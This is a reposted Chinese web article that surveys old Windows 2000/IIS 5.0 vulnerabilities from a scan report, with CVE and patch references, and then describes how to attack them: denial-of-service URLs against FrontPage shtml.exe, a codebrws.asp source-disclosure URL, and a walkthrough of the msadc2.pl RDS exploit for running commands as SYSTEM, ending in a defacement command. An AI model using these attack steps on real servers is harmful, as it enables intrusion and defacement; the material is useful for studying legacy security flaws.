当前位置: 王朝网络 >> system >> win2kserver+iis5.0的漏洞大全

win2kserver+iis5.0的漏洞大全

王朝system·作者佚名 2008-05-19

窄屏简体版字體: 小|中|大|超大

（附带黑狐网络的攻击方法）

劲刀狂舞最近用twwwscan扫描了自己的win 2k server，web server（iis5.0），sp1，结果很是令人担心。

从前笔扫描网络主机时，经常发现有这样的漏洞组合，原来是网络管理员的懒惰，使得主机漏洞百出，我只能把这些漏洞拿出来，伤他们的自尊了。

host: 127.0.0.1

port: 80

Server: Microsoft-IIS/5.0

if the webserver is apache,remove unnecessary information

IIS (codebrws.asp) Hole B

/iissamples/sdk/asp/docs/codebrws.asp

solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/

RDS Securty Hole(msadcs.dll)

/msadc/msadcs.dll

important patch

CVE-1999-1011

solution:MS99-025.asp

IIS Path Reveal(anything.idq)

/test.idq

IIS Path Reveal

IIS Path Reveal(anything.ida)

/test.ida

IIS Path Reveal

Malform Hit-Highlighting(qfullhit.htw)

CVE-2000-0097

MS00-006.asp

Index Server Security Hole(null.htw)

CVE-2000-0097

MS00-006.asp

FrontPage 2k

/_vti_bin/shtml.dll/nosuch.htm

CAN-2000-0413

solution:vendor homepage

FrontPage 2k,IIS Multiple (shtml.dll)

/_vti_bin/shtml.dll

good reading Cross-site Scripting Overview

solution:vendor homepage

Frontpage97 fpcount bof(fpcount.exe)

/_vti_bin/fpcount.exe

solution:delete fpcount.exe

FrontPage MS-DOS Device DoS(shtml.exe)

/_vti_bin/shtml.exe

vendor homepage

IIS 4/5 remote execute check method A

important patch

solution:MS00-057

Indexing service for win2k .htw

solution:MS00-084

其中：

_vti_bin/shtml.dll

入侵者利用这个文件将能使您的系统的CPU占用率达到100%

"http://TrustedServer如果用户点击上述指定的链接，脚本将通过HTTP请求从客户端传送给可信任的站点，可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时，将执行该脚本，并将赋予来自可信任站点的内容的所有权力赋予该脚本。

使用如下格式的URL：

http://iis5server/_vti_bin/shtml.dll/

shtml.exe

如果您使用Front Page作为您的WebServer，那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器，做您不希望的事

提交这样的链接，都可能使FrontPage Server Extensions停止响应： http://www.example.com/_vti_bin/shtml.exe/com1.htm

http://www.example.com/_vti_bin/shtml.exe/prn.htm

http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm

http://www.example.com/_vti_bin/shtml.exe/com1.asp

http://www.example.com/_vti_bin/shtml.exe/com1.

codebrws.asp

描述：在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路径:

http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?source=/index.asp

就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。

Microsoft IIS Unicode解码目录遍历漏洞

这个不用说了，小孩子都知道了。

msadc

IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行

你系统的命令。主要核心问题是存在于RDS Datafactory，默认情况下，

它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，

其一般默认情况下是SYSTEM用户。

利用程序为\cgi\iis_cgi\msadc2.pl，我们看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -h www.targe.com

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出现cmd /c后，直接键入命令行，就可以以system权限执行命令了。比如xundi教的：

echo hacked by me d:\inetpub\wwwroot\victimweb\index.

点击展开全文

上一篇：Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法

下一篇：WININIT.INI文件与Windows病毒

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12